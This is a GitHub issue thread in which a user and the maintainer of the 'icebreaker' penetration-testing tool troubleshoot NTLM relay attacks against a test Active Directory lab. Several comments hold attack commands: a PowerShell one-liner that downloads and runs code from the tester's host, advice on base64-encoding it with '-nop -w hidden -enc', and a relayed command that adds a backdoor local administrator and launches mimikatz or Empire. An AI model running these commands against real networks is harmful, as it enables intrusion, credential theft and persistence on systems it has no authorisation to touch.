DanMcInerney
commented
6 years ago Can you send me the ntlmrelayx.py output both before and after icebreaker said it added the new user?
Closed theoneandonly-vector closed 6 years ago
DanMcInerney
commented
6 years ago Can you send me the ntlmrelayx.py output both before and after icebreaker said it added the new user?
theoneandonly-vector
commented
6 years ago ntlmrelayx.py.log full log-file
DanMcInerney
commented
6 years ago This is very odd. It looks like it should've successfully completed. Have you logged into the machine at .1 and confirmed icebreaker is not a a user with net user? I can't find anything in the code that might be the cause here. Nor can I replicate in any of my three labs.
theoneandonly-vector
commented
6 years ago I can login and see a local user "icebreaker" but I can't remotely execute code as him via smb, he has no admin permissions, no rdp etc.
Am 06.03.2018 18:53 schrieb "Dan McInerney" notifications@github.com:
This is very odd. It looks like it should've successfully completed. Have you logged into the machine at .1 and confirmed icebreaker is not a a user with net user? I can't find anything in the code that might be the cause here.
— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/DanMcInerney/icebreaker/issues/4#issuecomment-370869075, or mute the thread https://github.com/notifications/unsubscribe-auth/AJ5jE2YdU2EJc2XFihzUh3cvhMvup76Cks5tbs0DgaJpZM4SaGjG .
DanMcInerney
commented
6 years ago Ah, interesting. OK so ntlmrelayx runs a command like this: net user icebreaker /add; net localgroup administrators /add icebreaker; <mimikatz/empire launcher code>. So my question is, did the script parse any mimikatz output or did you get an empire launcher if you ran it with --auto? Because I'm thinking the user that we hijacked the SMB connection from may not have had permissions to add a user to local admin (not sure how this would happen), or maybe the local administrators group was renamed? Or possibly an antivirus prevented the addition of the user to the local admins. Last possibility I can think of that might be the most likely is there's a GPO policy in place that overwrites the Administrators group to whatever is specified in the GPO.
theoneandonly-vector
commented
6 years ago AV is deactivated for this first test. I don't see any mimikatz output.
--auto just gives me an error.. submodule "empire" isn't setup correctly:
Traceback (most recent call last):
File "empire", line 1360, in
So DeathStar can't connect to it.
DanMcInerney
commented
6 years ago You must've cloned icebreaker in the short period of time yesterday that I
was messing with Empire versions as that error you got was the same error I
was getting off the Empire dev branch. It should be working now. But the
fact you didn't see any mimikatz output points towards something happening
mid-command execution. One thing to try is to copy the base64 value out of
the ntlmrelayx command, then run it on the machine locally using:
powershell -nop -exec bypass -enc
On Wed, Mar 7, 2018 at 3:44 AM, theoneandonly-vector < notifications@github.com> wrote:
AV is deactivated for this first test. I don't see any mimikatz output.
--auto just gives me an error.. submodule "empire" isn't setup correctly:
Traceback (most recent call last): File "empire", line 1360, in main = empire.MainMenu(args=args) File "/opt/icebreaker/submodules/Empire/lib/common/empire.py", line 84, in init (self.isroot, self.installPath, self.ipWhiteList, self.ipBlackList, self.obfuscate, self.obfuscateCommand) = helpers.get_config('rootuser, install_path,ip_whitelist,ip_blacklist,obfuscate,obfuscate_command') File "/opt/icebreaker/submodules/Empire/lib/common/helpers.py", line 554, in get_config cur.execute("ALTER TABLE config ADD COLUMN %s BLOB" % (field)) sqlite3.OperationalError: no such table: config
So DeathStar can't connect to it.
— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/DanMcInerney/icebreaker/issues/4#issuecomment-371098764, or mute the thread https://github.com/notifications/unsubscribe-auth/ABuspcUh3MeBujAOTdROkwymwN9RaT7Fks5tb7oHgaJpZM4SaGjG .
theoneandonly-vector
commented
6 years ago new error occured after re-installing..
[] Attack 4: NTLM relay with Responder and ntlmrelayx [] Running: python2 submodules/Responder/Responder.py -wrd -I enp0s3 Traceback (most recent call last): File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 141, in _new_conn (self.host, self.port), self.timeout, **extra_kw) File "/usr/lib/python3.6/site-packages/urllib3/util/connection.py", line 83, in create_connection raise err File "/usr/lib/python3.6/site-packages/urllib3/util/connection.py", line 73, in create_connection sock.connect(sa) ConnectionRefusedError: [Errno 111] Connection refused
During handling of the above exception, another exception occurred:
Traceback (most recent call last): File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 601, in urlopen chunked=chunked) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 346, in _make_request self._validate_conn(conn) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 850, in _validate_conn conn.connect() File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 284, in connect conn = self._new_conn() File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 150, in _new_conn self, "Failed to establish a new connection: %s" % e) urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTTPSConnection object at 0x7f01fafccd68>: Failed to establish a new connection: [Errno 111] Connection refused
During handling of the above exception, another exception occurred:
Traceback (most recent call last): File "/usr/lib/python3.6/site-packages/requests/adapters.py", line 440, in send timeout=timeout File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 639, in urlopen _stacktrace=sys.exc_info()[2]) File "/usr/lib/python3.6/site-packages/urllib3/util/retry.py", line 388, in increment raise MaxRetryError(_pool, url, error or ResponseError(cause)) urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='0.0.0.0', port=1337): Max retries exceeded with url: /api/admin/login (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0x7f01fafccd68>: Failed to establish a new connection: [Errno 111] Connection refused',))
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "./icebreaker.py", line 1523, in
Command has been completed, press ENTER to exit the terminal.
theoneandonly-vector
commented
6 years ago and what does this mean exactly?: [] Authenticating against ('SMB', '10.20.23.1', 445, '') as Domain\User SUCCEED [] username:hash [*] Running: submodules/JohnTheRipper/run/john --format=netntlmv2 --wordlist=1mil-AD-passwords.txt /opt/icebreaker/hashes/NTLMv2-hashes-brhUwcU.txt --session=brhUwcU [-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
theoneandonly-vector
commented
6 years ago could you tell me, how I can get a powershell empire session throgh custom command execution? as the powershell-oneliner it can generate has some problems: [*] Executed specified command on host: 10.20.23.1 [-] 'ascii' codec can't encode character u'\ufffd' in position 309: ordinal not in range(128)
and web-delivery also won't work: ./icebreaker.py -l /home/admin/Desktop/targets.txt -s dns -c "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.20.23.188:80/'))"" bash: syntax error near unexpected token `('
DanMcInerney
commented
6 years ago rpc_s_access_denied is an ntlmrelayx error but nothing to worry about; cmd exec will occur without it.
when you're doing the single command you're using double quotes twice. The command prompt is interpreting that as " powershell.exe -nop -w hidden -c " being one string, then " IEX ((new-object net.webclient).downloadstring(' http://10.20.23.188:80/')) " as a second string. You'll need to escape the right quotes with \". I'll look into the right way to do it as soon as I can probably in the next couple weeks, just a lil busy at the moment.
On Fri, Mar 9, 2018 at 8:24 AM, theoneandonly-vector < notifications@github.com> wrote:
could you tell me, how I can get a powershell empire session throgh custom command execution? as the powershell-oneliner it can generate has some problems: [*] Executed specified command on host: 10.20.23.1 [-] 'ascii' codec can't encode character u'\ufffd' in position 309: ordinal not in range(128)
and web-delivery also won't work: ./icebreaker.py -l /home/admin/Desktop/targets.txt -s dns -c "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.20.23.188:80/'))"" bash: syntax error near unexpected token `('
— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/DanMcInerney/icebreaker/issues/4#issuecomment-371843739, or mute the thread https://github.com/notifications/unsubscribe-auth/ABuspQs_d3yQYBn_sQePwrb7Eb5_GaWAks5tcp6qgaJpZM4SaGjG .
DanMcInerney
commented
6 years ago I mispoke earlier. The rpc_s_access_denied error occurs when you are relaying a user with non-admin rights on the target machine. Command exec will not occur in this situation. The error I was thinking of I keep seeing that doesn't affect command execution is "SMB SessionError: STATUS_SHARING_VIOLATION(A file cannot be opened because the share access flags are incompatible.)"
The error you're getting where it says connection refused could be a handful of things. I think the most likely is that the adapter it's using (enp0s3) is not the correct one. You'll want to use your main internet connection adapter. You can see a list of your adapters with ip a. You can specify this adapter with the -i option. But basically the error states that none of the tools are able to establish network connections to each other like DeathStar can't connect to the Empire API. If it's not the adapter then I'm not sure what it is except that it centers around your network connection and not being able to make any network connections.
As for your error trying to get an empire shell with -c, I didn't have any trouble in my tests just now. The \ufffd unicode character is the replacement character for when unicode doesn't have a code for the character. This shouldn't occur in the Empire powershell launcher commands as they're base64 encoded which only uses characters that unicode can interpret. Are you pasting the Empire powershell launcher into a different program, then copying it out of that program? It seems like an artifact from another program or you're copying too many characters when you copy the Empire launcher out of the terminal.
Last, your best bet for getting metasploit's web delivery to work is to base64 encode it first using https://raikia.com/tool-powershell-encoder/. So take IEX ((new-object net.webclient).downloadstring('http://10.20.23.188:80/'))...whatever else, base64 encode that using Powershell base64 encoding (different than regular base64 encoding, that raikia link will do it for you) then use the -c option like so: -c "powershell -nop -w hidden -enc <base64 encoded cmd>"
The reason you're having trouble with the MSF webshell delivery is because you have to account for the fact that any command you want to run using icebreaker is going through 3 different interpreters: first bash because we run it in a terminal, then python interprets it, then the windows shell interprets its. Each of these has different special characters. You can mostly ignore the python interpreter because it's going to take the whole command as a string, but bash and windows are gonna mess with it. Best to avoid special chars like (, ), !, ~, etc entirely by base64 encoding the command.
DanMcInerney
commented
6 years ago I finally got your errors about the connection while testing. It happens when Empire is not done booting up the REST API and we try to call DeathStar. I will fix this today to give it better error handling.
DanMcInerney
commented
6 years ago So there doesn't seem to be an easy way of gracefully handling the connection errors DeathStar sends out if it tries to connect to Empire before the REST API is good to go. So I just increased the timeout between Empire starting up and DeathStar starting up which should fix it on everything but the absolute slowest of computers.
theoneandonly-vector
commented
6 years ago it somehow crashes directly when the attack starts (no timeout): [] Attack 4: NTLM relay with Responder and ntlmrelayx [] Running: python2 submodules/Responder/Responder.py -wrd -I enp0s3 Traceback (most recent call last): File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 141, in _new_conn (self.host, self.port), self.timeout, **extra_kw) File "/usr/lib/python3.6/site-packages/urllib3/util/connection.py", line 83, in create_connection raise err File "/usr/lib/python3.6/site-packages/urllib3/util/connection.py", line 73, in create_connection sock.connect(sa) ConnectionRefusedError: [Errno 111] Connection refused
During handling of the above exception, another exception occurred:
Traceback (most recent call last): File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 601, in urlopen chunked=chunked) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 346, in _make_request self._validate_conn(conn) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 850, in _validate_conn conn.connect() File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 284, in connect conn = self._new_conn() File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 150, in _new_conn self, "Failed to establish a new connection: %s" % e) urllib3.exceptions.NewConnectionError: <urllib3.connection.VerifiedHTTPSConnection object at 0x7efec53336a0>: Failed to establish a new connection: [Errno 111] Connection refused
During handling of the above exception, another exception occurred:
Traceback (most recent call last): File "/usr/lib/python3.6/site-packages/requests/adapters.py", line 440, in send timeout=timeout File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 639, in urlopen _stacktrace=sys.exc_info()[2]) File "/usr/lib/python3.6/site-packages/urllib3/util/retry.py", line 388, in increment raise MaxRetryError(_pool, url, error or ResponseError(cause)) urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='0.0.0.0', port=1337): Max retries exceeded with url: /api/admin/login (Caused by NewConnectionError('<urllib3.connection.VerifiedHTTPSConnection object at 0x7efec53336a0>: Failed to establish a new connection: [Errno 111] Connection refused',))
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "./icebreaker.py", line 1530, in
DanMcInerney
commented
6 years ago Hmm yeah you're right. I'm not sure about this one. My main suspicion is that enp0s3 is the wrong interface. My VM will only bring up eth0 and lo interfaces and Responder works with lo so I'm not sure how to test with an incorrect interface. I tried running icebreaker with multiple responder programs running, but that didn't cause that error either. At this point I'd say try a different interface and let me know how that goes.
theoneandonly-vector
commented
6 years ago I have only these: enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.20.23.188 netmask 255.255.255.0 broadcast 10.20.23.255 inet6 fe80::8c80:2bed:1dc5:8582 prefixlen 64 scopeid 0x20 ether 08:00:27:75:c8:a5 txqueuelen 1000 (Ethernet) RX packets 6499 bytes 9136163 (8.7 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 2522 bytes 173337 (169.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
DanMcInerney
commented
6 years ago Dang so that's not it. I'm a bit at a loss.
On Mar 15, 2018 12:23 PM, "theoneandonly-vector" notifications@github.com wrote:
I have only these: enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.20.23.188 netmask 255.255.255.0 broadcast 10.20.23.255 inet6 fe80::8c80:2bed:1dc5:8582 prefixlen 64 scopeid 0x20 ether 08:00:27:75:c8:a5 txqueuelen 1000 (Ethernet) RX packets 6499 bytes 9136163 (8.7 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 2522 bytes 173337 (169.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1000 (Local Loopback) RX packets 17 bytes 1497 (1.4 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 17 bytes 1497 (1.4 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/DanMcInerney/icebreaker/issues/4#issuecomment-373476357, or mute the thread https://github.com/notifications/unsubscribe-auth/ABuspcn5Fsx6RP2U1N0qjcDdyv8FTnHfks5terGdgaJpZM4SaGjG .
hey there It tells me,it automatically created an account "icebreaker:P@ssword123456" but I somehow can't login via psexec: ] 10.20.23.1:445 - Authenticating to 10.20.23.1:445 as user 'icebreaker'... [] 10.20.23.1:445 - Uploading payload... [-] 10.20.23.1:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
it's the AD in my test environment.